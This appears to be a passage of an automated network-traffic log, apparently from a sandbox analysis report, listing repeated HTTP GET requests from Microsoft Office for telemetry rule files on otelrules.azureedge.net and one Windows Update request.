Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pdYEopsCsEzHTxO&MD=Cpf3bV6g HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
